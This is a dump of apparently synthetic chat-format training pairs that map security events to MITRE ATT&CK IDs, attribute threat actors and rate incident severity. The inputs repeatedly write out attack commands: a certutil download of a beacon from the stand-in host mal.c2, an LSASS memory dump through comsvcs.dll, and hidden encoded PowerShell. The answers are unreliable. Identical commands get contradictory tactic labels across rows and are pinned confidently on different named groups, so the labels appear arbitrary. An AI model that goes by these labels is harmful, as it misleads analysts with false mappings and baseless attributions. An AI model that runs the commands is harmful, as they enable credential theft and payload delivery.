messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-UYGYSZEORR)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Persistence", "role": "user" }, { "content": "{\"severit...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.137.126.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1221\"]}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.93.251.53", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1021.00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-X4LN8NMXGN)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Defense Evasion, Persistence", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1606 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may gather credentials that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1589\", \"T1589.001\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.", "role": "user" }, { "content": "{\"tacti...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1558.003\", \"T1558\"]}",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2090 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1784 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-6VSGFJON57)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Lateral Movement", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3085 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confid...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Pysa can perform network reconnaissance using the Advanced IP Scanner tool.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.174.234.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0043\"], \"tech...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1874 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.159.67.170", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-IEWD7IVC0G)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Discovery", "role": "user" }, { "content": "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.173.191.55", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0006\"], \"techniques\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-EALXE0YPFK)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Defense Evasion", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1354 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.2.48.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0008\", \"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 542 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-FB4RBZ9F39)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Privilege Escalation, Reconnaissance", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1331 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.44.95.108", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0040\", \"TA0006\"], \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2631 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.179.167.151", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0011...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the firs...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.002\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly executed processes of MSBuild.exe.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1127.001\", \"T1127\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Crimson can check the Registry for the presence of HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\last_edate to determine how long it has been installed on a host.", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-TBE1W70SZI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access", "role": "user" }, { "content": "{\"se...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BoomBox can execute an LDAP query to discover e-mail accounts for domain users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.003\", \"T1087\"]}", "role": "ass...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.18.225.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniq...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "role": "assi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: If an adversary creates resources in an unused region, they may be able to operate undetected.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1535\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.171.16.152", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1098.00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: POWRUNER may collect local group information by running net localgroup administrators or a series of other commands on a victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-HE8H69RVMS)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-LDABHU5A8U)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Collection", "role": "user" }, { "content": "{\"se...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.120.219.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0007\", \"TA0011\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 750 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.140.48.86", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidence\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-0MK88L1Y91)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Discovery", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2263 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ShadowPad uses a DGA that is based on the day of the month for C2 servers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\", \"T1568.002\"]}", "role": "assistan...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.77.34.159", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0003\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-IR59SZ88IP)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Persistence", "role": "user" }, { "content": "{\"se...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3128 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.141.66.220", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0006\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.49.184.215", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-1J59MXARIO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Extr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-3J1CCWDSWM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Defense Evasion, Impact", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Hildegard has decrypted ELF files with AES.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.111.211.116", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0009\", \"TA0005\"],...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.15.97.54", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0008\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-UQ4UCWOE6L)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Privilege Escalation, Initial Access", "role"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.101.217.34", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\"]}...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-QE1TEBUG44)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Discovery, Privilege Escalation", "role": "user" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1190\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1914 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.23.184.186", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techni...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: More_eggs uses HTTPS for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-LOOV8B3VYE)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Command and Control", "role": "user" }, { "c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3906 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.66.237.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0006\", \"TA0001\"], \"t...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.62.176.229", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0002\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-2VIJ52FXM9)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Defense Evasion, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-1GC6R5ZFJT)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-8JYH2HJ6BN)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Execution", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-G4O1KGU2TJ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Collection", "role": "user" }, { "content": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Consider use of services that may aid in the tracking of certificates in use on sites across the Internet.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1608.003\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-HOG9H1ULQ8)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Credential Access, Exfiltration", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2766 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.162.92.160", "role": "user" }, { "content": "{\"tactics\": [\"TA0043...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter bloc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.134.212.173", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0011\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-6PCBA0VRDT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Collection, Discovery", "role": "user" }, { "conten...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1108 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.82.58.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1543 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-BZTV6FKSMC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Initial Access, Reconnaissance", "role": "user" }, { "...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ThiefQuest invokes time call to check the system's time, executes a sleep command, invokes a second time call, and then compares the time difference between the two time calls and the amount of time the system slept ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: QUADAGENT has a command to delete its Registry key and scheduled task.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: DustySky has used both HTTP and HTTPS for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]